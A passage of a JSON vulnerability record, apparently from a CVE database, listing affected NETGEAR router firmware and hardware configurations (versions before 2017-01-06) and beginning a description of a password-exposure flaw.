"matchCriteriaId": "430497AE-7C43-400E-9C70-001B2DA23B67",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "769065AA-BC73-4674-87B0-3D514FEFDBEF",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200:v1:*:*:*:*:*:*:*",
"matchCriteriaId": "F50D834B-D7B3-43D6-8072-8992FBC8C97B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "769065AA-BC73-4674-87B0-3D514FEFDBEF",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "509F9F22-24E7-45E9-AB96-17F8B50813F5",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "769065AA-BC73-4674-87B0-3D514FEFDBEF",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "099184A0-F1C6-4C3F-9C3B-F0B9AC0D4D14",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200b_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5158CF4D-80FC-44FD-B9DA-442FA3A1A913",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200b:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "8A4EE9AB-F3DE-4EA8-8344-7F62288EC921",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200b_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5158CF4D-80FC-44FD-B9DA-442FA3A1A913",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200b:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "25090794-A90C-40CD-8E95-87EC4E98B928",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgnd3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "696689E8-E4C4-4A92-9D00-4C6B8CA80448",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgnd3700:v1:*:*:*:*:*:*:*",
"matchCriteriaId": "8A5971C6-2F27-4715-BC9E-378B647611D8",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgnd3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "696689E8-E4C4-4A92-9D00-4C6B8CA80448",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgnd3700:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "7A8F0B8E-D3F2-43C9-8B12-43DE4226E826",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgnd3700b_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E607B102-4151-4829-B5D5-779D096D620F",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgnd3700b:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C6F2634F-EA5A-48CE-91BA-964C0B40AF8E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jnr1010_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9F19C07A-65D3-4FFF-9D11-58C2B4D7A531",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jnr1010:v1:*:*:*:*:*:*:*",
"matchCriteriaId": "B4196FE8-4491-442C-96A0-23495165D3B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jnr1010_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9F19C07A-65D3-4FFF-9D11-58C2B4D7A531",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jnr1010:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "CCE79B3F-8667-43C9-962D-EE089428F144",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jnr3300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D5738544-7D8A-45AD-99F3-6F92C6886ACD",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jnr3300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "64CA12CC-48D8-4510-983C-8350A87CD5D2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jr6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "30751D8C-301D-4C9F-8512-E887512CE388",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jr6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "2C1C81B4-033E-4F44-9D17-27B04FCF8EF4",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jr6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0AF8ACF6-2BDF-49C2-B92F-2207D83664BF",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jr6150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D67167E5-81D2-4892-AF41-CBB6271232D1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:jwnr2000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "86B79A3A-8A63-4BD5-9016-8C98AEF737A8",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:jwnr2000:v5:*:*:*:*:*:*:*",
"matchCriteriaId": "3D78543E-37A7-4829-9165-D0CF52DD4867",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r2000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7D0BCC15-918E-4A31-A943-C5B72CB117E9",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r2000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9B1D13C3-5663-447F-9FD9-71EBEC471DAF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6050_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "675EBB75-3DB8-45D7-9512-5D297C680750",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6050:-:*:*:*:*:*:*:*",
"matchCriteriaId": "363D4DEE-98B9-4294-B241-1613CAD1A3A7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "067085C6-EA5C-430B-B81E-A5809BD047B0",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F44A123-B256-428B-98C2-17570F2F32DC",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "ECBBDBEC-C896-4130-933B-150DB17662A3",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8A466B29-3ADA-46D9-824C-8DF9160B7DD7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "ECBBDBEC-C896-4130-933B-150DB17662A3",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6200:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "719248B0-BE22-4836-A23E-FE9F7590FB0C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "717CDDCB-3DEB-4949-AAC8-D939D01A0858",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B131B5C8-CB7F-433B-BA32-F05CE0E92A66",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "760BD171-837C-4D36-A4AF-551E926B53C0",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AC7F9A44-CC92-4E00-A274-ADA08469F33F",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9597966A-B13C-4098-838B-EC9AA8DE443D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AC7F9A44-CC92-4E00-A274-ADA08469F33F",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "66DBD436-0DA8-4917-99EB-6A5D0C3D42D1",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9D2356B7-389D-4612-8DBE-00C6AC35BD3D",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9866D7B9-622A-4B25-8CFA-D31AB4406A4F",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "EF3B3F26-401C-4ED0-B871-4B4F8521F369",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2BC36898-99C5-4755-9C42-687EAC07013B",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1BBF5B80-58EB-467E-8E07-6CB6C2E88BBC",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wgr614_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A746A6A7-AFD5-41DC-B805-C1526CFD2E95",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wgr614:v10:*:*:*:*:*:*:*",
"matchCriteriaId": "B47B0897-A9B9-4568-84DD-C3CE0118B439",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B2BF93E7-2E14-48C7-BD1A-9C5FC3451334",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "25187765-6842-4F6A-BF5E-B2E634A958A0",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B2BF93E7-2E14-48C7-BD1A-9C5FC3451334",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "17D010FA-275D-4D34-8DB8-49BEA70AF6DA",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3700:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "A239B4C0-0CD9-4632-A1E3-68B8E39692B3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "17D010FA-275D-4D34-8DB8-49BEA70AF6DA",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3700:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "257A5E68-8EDC-44F5-A85C-83A91C93CCE5",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "17D010FA-275D-4D34-8DB8-49BEA70AF6DA",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3700:v5:*:*:*:*:*:*:*",
"matchCriteriaId": "EC5B6CB8-D439-42D5-ACAE-6246874EA5F0",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "58CC514B-1570-4116-9E1F-289BD9DD5935",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1413C591-D066-4FA2-BEB1-6C60F8645F28",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "58CC514B-1570-4116-9E1F-289BD9DD5935",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "4428B145-B86D-4709-BBA9-64BDE7D35A25",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A3BC4526-3FCE-42D3-B34A-C32060B78AF7",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4500:v1:*:*:*:*:*:*:*",
"matchCriteriaId": "829C71CF-A1E7-456E-8230-8929BD7E867C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A3BC4526-3FCE-42D3-B34A-C32060B78AF7",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4500:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "AB00ECAD-7474-4D85-8248-D014E5808814",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A3BC4526-3FCE-42D3-B34A-C32060B78AF7",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4500:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "C31D6808-4103-4543-B7AB-84A79CD12006",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr1000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "17B45AE0-0FBF-478B-966F-B2B28C971C3C",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr1000:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "938F4D22-AEFC-4141-BC1C-101F835D4E77",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr1000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "17B45AE0-0FBF-478B-966F-B2B28C971C3C",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr1000:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "91D091D4-04EA-4564-A2CC-88E217A9FC08",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr1000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "17B45AE0-0FBF-478B-966F-B2B28C971C3C",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr1000:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "C8218868-273B-46DB-B636-D3F9A3768069",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr2000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CCA254A9-B22D-44C5-9261-19AFBD2B2EE4",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr2000:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "C547734B-BF1A-4CD9-8FD8-9ECB3D15B0BA",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr2000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CCA254A9-B22D-44C5-9261-19AFBD2B2EE4",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr2000:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "D2913468-C442-48A3-8AD9-A2F3CCDD7952",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr2000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CCA254A9-B22D-44C5-9261-19AFBD2B2EE4",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr2000:v5:*:*:*:*:*:*:*",
"matchCriteriaId": "317F25FF-B3A2-4C68-888F-D2627C564867",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr2200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BFCD5179-4D17-4187-BFFD-7FF080804D95",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr2200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "94B74E4A-3E2F-4CB1-B33D-8618ED1C7E9F",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr2500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AF1CD0F5-D109-460F-9417-1907A6368A8B",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr2500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "EA9EF618-6194-4127-BD60-FB0E645C8993",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DDBCEE9B-9189-42DA-86D1-3FF6E4168127",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C8DE4BFA-41DE-4748-ACC7-14362333A059",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by password exposure. This affects AC1450 before 2017-01-06, C6300 before 2017-01-06, D500 before 2017-01-06, D1500 before 2017-01-06, D3600 before 2017-01-06, D6000 before 2017-01-06, D6100 before 2017-01-06, D6200 before 2017-01-06, D6200B before 2017-01-06, D6300B before 2017-01-06, D6300 before 2017-01-06, DGN1000v3 before 2017-01-06, DGN2200v1 before 2017-01-06, DGN2200v3 before 2017-01-06, DGN2200V4 before 2017-01-06, DGN2200Bv3 before 2017-01-06, DGN2200Bv4 before 2017-01-06, DGND3700v1 before 2017-01-06, DGND3700v2 before 2017-01-06, DGND3700Bv2 before 2017-01-06, JNR1010v1 before 2017-01-06, JNR1010v2 before 2017-01-06, JNR3300 before 2017-01-06, JR6100 before 2017-01-06, JR6150 before 2017-01-06, JWNR2000v5 before 2017-01-06, R2000 before 2017-01-06, R6050 before 2017-01-06, R6100 before 2017-01-06, R6200 before 2017-01-06, 